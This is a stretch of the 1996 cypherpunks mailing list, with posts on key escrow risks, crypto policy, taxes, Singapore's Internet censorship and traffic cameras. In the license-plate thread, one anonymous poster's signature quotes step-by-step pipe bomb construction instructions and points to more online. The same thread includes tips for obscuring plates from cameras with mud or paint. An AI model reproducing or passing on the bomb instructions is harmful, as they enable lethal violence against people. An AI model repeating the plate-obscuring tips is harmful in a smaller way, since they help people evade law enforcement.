> they are to obey the law.

Slightly off topic:

I haven't seen this horror of GAK discussed here, but this is (IMHO) as
important as possible abuse by LEA's.

Let's factor the LEA's out for a bit.

The US government gets their mandatory key access, and keeps their keys in
three databases in various locations.

Most foreign powers would pay someone a handsome sum to hand over these
keys.  I would bet that France or Iran would offer a billion dollars to
someone who would turn over the part of the database they preside over.

I bet that France/Iran/etc. would be able to pool together 3 billion
dollars and a nice getaway for the stooges who can grab a tape with the
escrowed keys on it.  Heck, Ames turned traitor for less.  (I am assuming
the keys as small, 1K bytes each... an 8mm Exabyte mammoth tape would be
able to carry 30 million keys.)  Even an "el cheapo" Travan TR3 tape would
be able to snarf 1.6 million keys... and that's a lot of people
compromised!

Soon, you have the US's whole security structure totally compromised.
Any business transactions, any communications are now subject to tapping
by foreign agents, and all US crypto would be absolutely powerless.  And
you thought ITAR put companies at a disadvantage. US companies would
be stomped on by competition which seems to have the same product just
slightly earlier or slightly more refined, or they would move out of the
US, so they can use strong crypto.

Even if one assumes that the LEA's are incorruptable, there are always
people who are willing to watch their country go down in flames for money.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 15 Aug 1996 11:04:10 +0800
To: "Marc J. Wohler" <cypherpunks@toad.com
Subject: Re: Stopped Clock. Was: Schlafly on Crypto
Message-ID: <199608150016.RAA00804@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 AM 8/14/96 -0400, Marc J. Wohler wrote:
>At 07:59 AM 8/14/96 -0400, you wrote:
>>Subject: Clinton Is Trying to be Big Brother -- Phyllis Schlafly Column 8/8/96
>
>It makes me ill to agree with Schlafly on any issue, but 'Even a stopped
>clock.......
>Unrepentant Liberial

It does seem really odd, doesn't it?  But look at it this way:  The only 
reason the knuckle-dragging conservatives are able to take the moral 
high-ground on this and other net-freedom issues is because the OTHER 
"unrependant liberals" have inexplicably abandoned the correct side of the 
argument.  The fact that the conservatives are right may seem odd, but the 
behavior of the liberals is truly astonishing.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Aug 1996 11:01:20 +0800
To: cypherpunks@toad.com
Subject: Re: Capital and Taxes
Message-ID: <ae37bc5b0102100478b3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:27 PM 8/14/96, Greg Hopper wrote:
>When you consider that capital gains tax rate schedules are not indexed for
>inflation, the situation's even worse than Tim's analysis implies.  Since
>you pay tax on the nominal rather than the real capital gain, the effective
>capital gains tax rate is really higher than the quoted rate.
>----------------------------------------------------------------------
>Greg Hopper                     |Disclaimer:  The opinions expressed are
>
>Research Department             |my own and not necessarily those of
>Federal Reserve Bank            |the Federal Reserve Bank of Philadelphia
>of Philadelphia                 |or the Federal Reserve System.

I certainly agree with Greg here, and find it too bad that his views do not
actually express the views of the Federal Reserve. (Actually, they may, as
I remember reading Alan Greenspan's stuff in Rand's books in the late 60s,
e.g., "Capitalism: The Unknown Ideal.")

Not only is there inflation to consider, there is the double taxation I
should've emphasized more than I did.

Wages are typically corrected for inflation (for competitiveness reasons),
but capital gains are not. That stock I bought for $20 in 1975 dollars and
am now selling for $40 in 1996 dollars, and paying 40% in taxes on the
"gain," is clearly not really a doubling.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Aug 1996 11:04:58 +0800
To: wb8foz@nrk.com
Subject: Re: photographed license plates
Message-ID: <ae37be1d02021004e289@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:30 PM 8/14/96, II I II I I I II I II II I I I I II I II wrote:
>>I note those plastic cover for plates "to keep them clean"
>>seem to be more & more popular.
>
>These are not allowed in California  (although the chance of getting
>popped must be quite slim, by the number you see).
>
>I remember seeing some water based spray paints in dun colors (such as
>a nice mud tan) -  Gee, officer, its just mud, <wipe>.

If I lived closer to the nearest city I know of with "photo tickets,"
namely, Campbell, California (about 30 miles away, over the Hill into
Silicon Valley). I would probably make sure my license plate had some real
mud on it...just enough to link some letters or numbers together to make
them unreadable with a low res. photo.

Maybe we'll have barcoded license plates sooner than we think. Then all of
those speed cameras can also track our movements.


--I II II II I I II I II II I II II I I II I I I II II


HOW TO MAKE A PIPE BOMB:
"Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack the powder. Don't even tap the bottom of the pipe to make it
settle.  You want the powder loose.  For maximum explosive effect, you need
dry, fine powder sitting loose in a very rigid container." (more
information at http://sdcc13.ucsd.edu/~m1lopez/pipe.html, or by using
search engines)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 15 Aug 1996 11:55:21 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Schlafly on crypto
In-Reply-To: <2.2.32.19960814185535.00e17344@mail.teleport.com>
Message-ID: <Pine.SUN.3.91.960814173100.22510C-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 14 Aug 1996, Alan Olsen wrote:

> Well, I can think of a few reasons to come to that conclusion.  
> 
> - Schlafly is the head of one of the more right-wing
> organizations in the country.  
 
Some right-wingers don't like free speech, most do.  This 
characterization is not enlightening on the question at hand.

> - She is very closly associated with the Buchanon campaign and
> the Christian coalition.  

Does Buchanan favor censorship of the Net?  If so, what leads you
to believe Schlafly shares that particular view?  This guilt by
(assumed) association is not fair nor persuasive.

> - Her organization, the Eagle Forum, distributes a couple of
> anti-porn rant tracts (http://www.eagleforum.org/users/eagle/
> public_html/misc/order.html) called _Pornography's Victims
> $4.95 (paperback) by Schlafly, ed._ 

Being against porn does not mean one is pro-censorship.  (I don't
like smoking, but I don't think it should be illegal.)  We need
something more concrete to support such an accusation.

> I know that he [Phyllis' son] is gay.  His mother seems to have
> had some problems coming to terms with the implications of alot
> of her rhetoric involving such things...

Really?  I though she very clearly has stated that she hates the
sin, not the sinner.  What evidence does Alan have that she has
had "some problems coming to terms..."?

> (She seems to confuse her religion with reality on this point.)

As does Alan.
 
> I would say there are alot of reasons to assume that Schlafly
> would try and impose her morality on the rest of the country if
> given half the chance.

Well Alan can say anything he wants, but he has given no 
*substantive* reasons to support his prejudices.  By her article
against Net censorship, Schlafly has given us at least one piece
of evidence to the contrary.

> Look at the people she chooses to associate with.

Jesus hung out with tax collectors and prostitutes.  Look at the
people he chose to associate with.  Guilt by association again?

Look folks, in this battle, "the enemy of my enemy is my friend."
We KNOW what Clinton and his gang think of our privacy and 
freedom of speech on the Net.  Let's not cut off our noses to 
spite our faces.  If Schlarly wants to lend a hand, let's not
bite it, okay?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Aug 1996 11:42:12 +0800
To: cypherpunks@toad.com
Subject: Re: Capital and Taxes
Message-ID: <ae37c5e803021004b734@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 PM 8/14/96, Llywarch Hen wrote:

>Yep, we've adopted the fuzziest-headed of liberal ideas in promoting
>government as an agent of change to improve things for Tim and his pals by
>asking wage earners to subsidize his economic activities by distributing the
>costs to the public so he can enjoy the profits. But this is just the result

But there are no "costs" to be distributed. The government already taxed
the corporation once, at 40-50%, and even taxed the gain due solely to
devaluation to the currency (inflation), so all I am asking is that I not
be taxed again. Of course, they will likely do so anyway. So I'm saying I
probably won't sell assets I might otherwise have sold (not surprisingly,
some folks even want unsold assets taxed).

For the record, I paid a *lot* of taxes this year, much more (by a factor
of several) than I putatively received in benefits.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 15 Aug 1996 12:20:22 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB8A50.F3A1BAE0@groningen08.pop.tip.nl>
Message-ID: <Pine.SUN.3.91.960814175425.22510F-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 15 Aug 1996, Bart Croughs wrote:

> 2) The word is also used as a term for financial ASSETS.

Dollar bills are a financial asset, but they are not a capital
asset.  

> So, I fear that it's Sandy who is confused about the meaning of
> the word 'capital', not me.

Bart may fear all he wants, but he is still confusing the two
meanings of the word.

> But even if it is me who is confused about the meaning of the
> word 'capital' (which isn't the case), this confusion wouldn't
> affect my argument at all. If American capital is invested in
> foreign countries instead of in the US, then the total amount
> of capital invested in the US will be lower than it would have
> been if the capital had been invested in the US.

Here is where Bart's confusion lies.  If he is talking about
investment dollars, they none of his Austrian quotes bear any
relationship to his conclusion.  If he is talking about shipping
steel mills overseas, there might be some justification, but I
don't think that's what he is talking about.  

Finally, he as not shown why US investors would move their
capital (of whatever nature) from non-competitive US companies
to foreign ones.  As I said in a previous post, the most likely
to happen is that US investors will move their capital (of
whatever nature) from non-competitive US companies to other US
companies that do enjoy a competitive advantage.

On a personal note:  Bart the people on this list are highly
intelligent.  Many if not most are students of Austrian 
economics.  By the tone of your posts my best guess is that you
are young (20's?) and have little practical experience in "the
real world."  This is not a crime, but it's no great honor 
either.  The people you have been tilting with are not arguing
just to be arguing.  They have a firm grasp of the subject matter
and fine analytical minds.  Your arguments to authority are okay,
but you show a serious intellectual inflexiblity.  I sincerely 
suggest you reconsider your demeanor on this list to date, and 
work to improve it.  Don't waste your reputation capital being a
jerk.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Thu, 15 Aug 1996 10:17:23 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Policy Variant
Message-ID: <199608142317.SAA02277@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


[...]
>Here is Staelin's idea:
>(1) You can use any crypto you want, but you must keep a record
>of the crypto keys you used.
>(2) The government can ask for the crypto keys later, if they have
>a court order, just as they can ask for any of your other papers
>or documents. You must give the key(s) to them, just as you
>must turn over your private papers in such a situation.
>(There would have to be an appropriate penalty for losing the
>key...)
[...]
>Is this workable??
[...]

Here's my key, your honor.  I used a one-time pad to do the encryption.  As
you can plainly see, the encrypted file that the prosecution made such a big
deal about contains nothing but some of my favorite verses from the King James
Bible.  You shouldn't infer anything from the fact that another key would
make the file contain the evil stuff that was alleged (even though it is a bit
strange that the last verse ends in the middle of a word).


                          | (Douglas) Hofstadter's Law:
                          | It always takes longer than you expect, even 
Frank Stuart              | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Aug 1996 11:54:24 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Policy Variant
Message-ID: <ae37c84d040210044735@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:17 PM 8/14/96, Frank Stuart wrote:

>Here's my key, your honor.  I used a one-time pad to do the encryption.  As
>you can plainly see, the encrypted file that the prosecution made such a big
>deal about contains nothing but some of my favorite verses from the King James
>Bible.  You shouldn't infer anything from the fact that another key would
>make the file contain the evil stuff that was alleged (even though it is a bit
>strange that the last verse ends in the middle of a word).

Frank presents a cogent example of how the Staelin plan is a nonstarter.
That is, it's a nonstarter *if* we remove any formal evidence of which
crypto method is attached to a program.

Cycles are cheap (compared to prison terms or a bullet in the head).
Therefore, it's cheaper to let folks either make their own guesses at the
crypto involved, or try several, than it is to unambigiously narrow down
the searches to one particular algorithm, which the State can then insist
on a decryption key for.

Let the Staelin Plan be warning for us to prepare for an era in which the
particular crypto method should not be revealed.

(Cryptographically, any of the various algorithms are "polynomially
equivalent," but, practically, the "King James Defense" used by Frank,
brilliantly, will probably work. It's hard to argue with Scripture.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Aug 1996 12:11:04 +0800
To: cypherpunks@toad.com
Subject: BlackNet Bids $350 M for a DAT tape
Message-ID: <ae37cc5305021004391d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:38 PM 8/14/96, Douglas R. Floyd wrote:

>Most foreign powers would pay someone a handsome sum to hand over these
>keys.  I would bet that France or Iran would offer a billion dollars to
>someone who would turn over the part of the database they preside over.
>
>I bet that France/Iran/etc. would be able to pool together 3 billion
>dollars and a nice getaway for the stooges who can grab a tape with the
>escrowed keys on it.  Heck, Ames turned traitor for less.  (I am assuming
>the keys as small, 1K bytes each... an 8mm Exabyte mammoth tape would be
>able to carry 30 million keys.)  Even an "el cheapo" Travan TR3 tape would
>be able to snarf 1.6 million keys... and that's a lot of people
>compromised!

Sure, the going bid is $350 million on BlackNet. I expect the price to go
higher, as more keys are involved.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 15 Aug 1996 09:14:20 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: SSL / Java(tm) Toolkit Available NOW (fwd)
Message-ID: <199608142328.SAA14124@homeport.org>
MIME-Version: 1.0
Content-Type: text


FYI.  
----- Forwarded message from Joel Fan -----

>From list@glacier.mcom.com  Wed Aug 14 17:52:49 1996
Resent-Date: Wed, 14 Aug 1996 14:35:05 -0700 (PDT)
Date: Wed, 14 Aug 1996 17:37:23 -0400 (EDT)
From: Joel Fan <jfan@phaos.com>
X-Sender: jfan@columbia.digiweb.com
To: ssl-talk@netscape.com
Subject: SSL / Java(tm) Toolkit Available NOW
Message-ID: <Pine.SOL.3.91.960814173211.8297A-100000@columbia.digiweb.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Resent-Message-ID: <"YXOYJ2.0.c67.nPa4o"@glacier>
Resent-From: ssl-talk@netscape.com
X-Mailing-List: <ssl-talk@netscape.com> archive/latest/1623
X-Loop: ssl-talk@netscape.com
Precedence: list
Resent-Sender: ssl-talk-request@netscape.com


Hello ,
  The SSLava(tm) 1.0 Toolkit implements the SSL 3.0
protocol in the Java programming language and is available
NOW, without charge, for non-commercial use, including testing.
Commercial licenses for SSLava are available as well.
  Please contact http://www.phaos.com/ for more information
or send mail to jfan@phaos.com. 

Thanks,
Joel Fan
----------------------
Phaos Technology Corp.
----------------------                                                        
[Java is a trademark of Sun Microsystems Inc.]

----- End of forwarded message from Joel Fan -----

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Aug 1996 12:17:50 +0800
To: cypherpunks@toad.com
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <ae37ce1606021004a2f1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:23 AM 8/15/96, Bart  Croughs wrote:

>Bart's error lies in his confusion of the terms "captial" and
>"capital investment."  While capital may be used to make capital
>investments, there are other things it can be spent for as well
>(wages, taxes, supplies, etc.).
>
>If Bart were to use the term "infrastructure" then it would be
>clear that the ebb and flow of mere capital would have relatively
>little to do with infrastructure influenced wages.<

I agree.

(On the other hand, Bart might want to find ways to make the material he is
quoting more distinct from his own comments. I find it very hard to tell
which comments are Bart's and which are those he is quoting.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Thu, 15 Aug 1996 03:23:23 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [SIGNAL] Microsoft's Internet Explorer
In-Reply-To: <v02120d0dae379f5d9e93@[192.0.2.1]>
Message-ID: <Pine.GSO.3.93.960814182110.21263A-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 Wed, 14 Aug 1996, Lucky Green asked:

> I don't see the 128 bit version. URL?

Neither do I anymore, but it was there yesterday. It was on the page,
where you chose the version. After that there was a form asking for your
(US citizens) name, address and phone number. After that the connection
got so slow I could not submit the form.

I believe Microsoft might have messed up something with the ITAR rules and
because of problems they do not give out the 128-bit version anymore. Or
it might have been an error and they really did not have an uncrippled
version yesterday.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 15 Aug 1996 05:16:52 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches
In-Reply-To: <v02120d0cae366bab297f@[192.0.2.1]>
Message-ID: <32120231.388F659A@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> At 9:27 8/13/96, Peter Trei wrote:
> 
> >I vaguely remember another possibly relevant precedent, where a
> >judge ruled that a warrant was required before a thermal imager
> >could be used to look at a house suspected by the police of
> >being a (pot) grow house.
> 
> Wrong. No warrant was used and the bust was upheld in court.

Hmm.  A case involving Texas cops hovering above a greenhouse for a
month using a 600mm telescope to peek through a 5-inch gap was thrown
out of court on the grounds that the crop was not in "plain view".
(Wheeler v State, Texas Court of Criminal appeals, 29/9/83).  However,
this was some time ago, so I'm sure the US constitution has been
whittled down a tad more since then.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 15 Aug 1996 11:17:07 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: re: National Socio-Economic Security Need for Encryption    Technology
In-Reply-To: <199608141547.IAA25312@dns1.noc.best.net>
Message-ID: <Pine.LNX.3.93.960814185202.721B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Aug 1996, James A. Donald wrote:
> Under democracy, people get the government they deserve and 
> get it good and hard.

     May I add this (attributed of course) to my .sig file?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 15 Aug 1996 01:00:48 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption  Technology
Message-ID: <1.5.4.32.19960814130043.00311c1c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 13/08/96 -0700, James A. Donald wrote:

>the fact that an engineer who is subject to the power of the Indian
>government is not worth very much, as is demonstrated by the fact
>that companies with Indian engineering teams often spend a lot of money
>to get their employees out of India.
>
>Demand for Indian programmers is less than supply not because capital
>has somehow failed to flow to India, but because an engineer in India
>is not free to produce the value that engineers elsewhere are free
>to produce.
>
Whoa! In economies that are highly de-coupled, incomes and prices
can easily find quite different equilibria. Of course, the
situation changes when trade increases. If you visited Italy in
the mid-'70s, prices were much lower than, say, in Germany.
Somewhere in the late '70s and early '80s, prices (and I hope
wages too) rose to "international" levels.

Why hasn't it happened in India? One reason for sure is that
despite all the talk of free trade, free movement of people does
not take place. Otherwise, plumbing, gardening, and all kinds of
services could have been provided in Western countries by
Indians, reducing supply and raising wages in India. 

It really  doesn't have much to do with "the power of the Indian
government" (except that I wish they had negotiated better at
GATT so that when the free flow of goods was talked about, the
flow of services was also treated at par). India has its faults,
but it still is a relatively democratic and free country. And
yes, capital has "somehow failed to flow to India,"  and for this
the restrictive policies of government are to blame.
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 15 Aug 1996 10:07:50 +0800
To: cypherpunks@toad.com
Subject: HRW letter to Singapore government; German telecom URL
Message-ID: <v01510128ae3818c3c23b@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Attached is the letter Human Rights Watch/Asia sent to Singapore yesterday.
Kudos to HRW for taking the lead in calling attention to the actions of the
censorhappy Singaporeans. More background is at:
  http://www.eff.org/~declan/global/

Also, you can find an English version of the German telecommunications act
at:
  http://www.government.de/inland/ministerien/post/tkge00.html

-Declan

---

August 13, 1996

BY FAX: +65-375-7765

Mr. George Yeo
Minister for Information and the Arts
460 Alexandra Road, 37th Story
PSA Building
Singapore 119963

Dear Mr. Yeo,

     I am writing on behalf of Human Rights Watch/Asia to protest the recent
decision by the Singapore government to establish strict controls on Internet
use. The implementation of the Class License Scheme, which, according to a
July 11 government news release, "will focus on content which may undermine
public morals, political stability and religious harmony,"ensures a leading
role for Singapore among international promoters of online censorship. This is
a particularly unfortunate role for Singapore, which has been a leader in the
development and promotion of Internet use in Asia. It places Singapore in the
same category as countries like China, where Internet users must endure
onerous restrictions.

     One of the most unique and valuable characteristics of the Internet is
its ability to establish easy, inexpensive and practically instantaneous
communication between the farthest points of the earth. By prohibiting
connections between its citizens and various Web sites outside its borders,
Singapore is in essence removing itself from the global Internet. If, as will
surely happen, its example is followed in other countries, the Internet, which
held such promise as the world's first truly global medium, will be nothing
more than a set of country-specific networks where local prejudices and fears
are reinforced by technology.

     Our specific objections concern Singapore's decision to regulate the
Internet as if it were a broadcast medium. Unlike broadcast media, the
Internet is the first truly mass medium. Through e-mail, it allows individuals
with nothing more than a computer and a modem to express their views to an
international audience. Even the World Wide Web differs significantly from a
broadcast medium in that individuals are not confronted with a particular site
upon connecting to the Web--they may choose whichever sites they choose to
visit. As with other forms of Internet communication, anyone may put up his or
her own site on the Web. The Singapore government's own use of Web pages
demonstrates how the Internet can be used to propound a particular point of
view. Its citizens, so long as they are not using their site to incite to
violence, should have the same opportunity to express views as their
government. As stated in Article 19 of the Universal Declaration of Human
Rights:

     Everyone has the right to freedom of opinion and expression: this
     right includes freedom to hold opinions without interference and
     to seek, receive and impart information and ideas through any
     media and regardless of frontiers.

     We are particularly concerned that restrictions have been placed on
Singaporeans who wish to discuss religious and political ideas online. It is
only through unrestricted discussions of such serious topics by all members of
society, no matter how unpopular their views, that these subjects become less
explosive. Forbidding discussion--in effect, treating its citizens like
children--will, on the other hand, ensure that dangerous topics remain just
that.

     We are also concerned that the extraordinarily broad categories of
forbidden content, as outlined by the SBA, will encourage arbitrary
restrictions on communication. According to the Internet Content Guidelines,
the following topics are banned.

     Public Security and National Defense

          a.   Contents which jeopardize public security or national
               defense.
          b.   Contents which undermine the public confidence in the
               administration of justice.
          c.   Contents which present information or events in such a
               way that alarms or misleads all or any of the public.
          d.   Contents which tend to bring the Government into
               hatred or contempt, or which excite disaffection
               against the Government.

     Racial and Religious Harmony

          a.   Contents which denigrate or satirize any racial or
               religious group.
          b.   Contents which bring any race or religion into hatred
               or resentment.
          c.   Contents which promote religious deviations or occult
               practices such as Satanism.

          Public Morals

          a.        Contents which are pornographic or otherwise obscene.
          b.        Contents which propagate permissiveness or
                    promiscuity.
          c.        Contents which depict or propagate gross exploitation
                    of violence, nudity, sex or horror.
          d.   Contents which depict or propagate sexual perversions
               such as homosexuality, lesbianism, and pedophilia.

By banning such subjects a chill will be sent through the online community in
Singapore, and will render the Internet essentially useless in allowing any
kind of serious discussion.

     In addition to forbidding particular content, the government has also
announced that some sites will be banned. Internet service providers were
given the deadline of September 14, 1996,  to begin using proxy
servers--devices that can prohibit connections to specified sites--to
connect all their
subscribers.

     Although the government has promised to use a light hand in regulating
the Internet, its activities even at this early stage indicate otherwise. A
July 12 posting in the Usenet newsgroup "soc.culture.singapore" was reportedly
removed at the request of the SBA, who asked local Internet service providers
for its removal because it alleged that lawyers at a local law firm were
incompetent. The request came, according to the Straits Times, after the law
firm complained to the government. Despite the removal from the newsgroup, the
message is still widely available to Singaporeans through other Internet
sources, indicating that content control will be difficult unless Internet
access is restricted even further.

     We hope that the Singapore government will retract these repressive new
regulations, and support the development of an unfettered Internet. Instead of
using its power to restrict Internet use, the government could play a truly
useful role by devising ways to expand its use to even the most disaffected
members of its population.

                                   Sincerely,
                                   Sidney Jones
                                   Executive Director

cc:  Mr. Goh Liang Kwang, Chief Executive Officer, Singapore Broadcasting
       Authority
     Ambassador Bilahari Kausikan, Permanent Mission of Singapore to the
       United Nations







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 15 Aug 1996 01:06:04 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: photographed license plates
Message-ID: <1.5.4.32.19960814130126.0031caac@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 16:04 13/08/96 -0800, Jim McCoy wrote:
>Here in the states the easy challenge to
>such a ticket would be "it was not me driving when that photo was taken" and
>the burden of proof is on the prosecution to prove that you were the driver.

In Germany, as I recall, if you use this argument, the cops
require you to thereafter maintain a log of who drives the car when.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Thu, 15 Aug 1996 13:13:35 +0800
To: unicorn@schloss.li
Subject: Re: Fw: Re: Free Pronto Secure Offer
Message-ID: <199608150252.TAA29747@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: unicorn@schloss.li, cypherpunks@toad.com, geoff@commtouch.co.il
Date: Wed Aug 14 21:52:47 1996
Personally I enjoyed helping to bring to market a full-featured PGP-aware 
mail package.  It was a product that I was interested in seeing and was 
able to participate in making suggestions as to features, etc.  It 
particular, Geoff was most help full in making sure that if performed under 
NT which was not initially supported, but is my platform (along with 
Linux).  It is a good product and will help to ease usability of PGP for 
people that are afraid of the steps required by many mailers to utilize 
PGP.  If I remember, your platform in Linux and you should not be so quick 
to criticize what you may have not seen.

for > On Tue, 13 Aug 1996, geoff wrote:
> 
> > -----BEGIN PGP SIGNED MESSAGE-----

> 
> "Do all the work I should be doing or have done in the first place
> discover the critical flaws in my new-keen-o-ka-jive-o crypto system and
>  I
> will give you a free copy of a critically flawed crypto system (a
>  $99.00
> value) ABSOLUTELY FREE.  Wait, don't order yet.  Included you also get
>  to
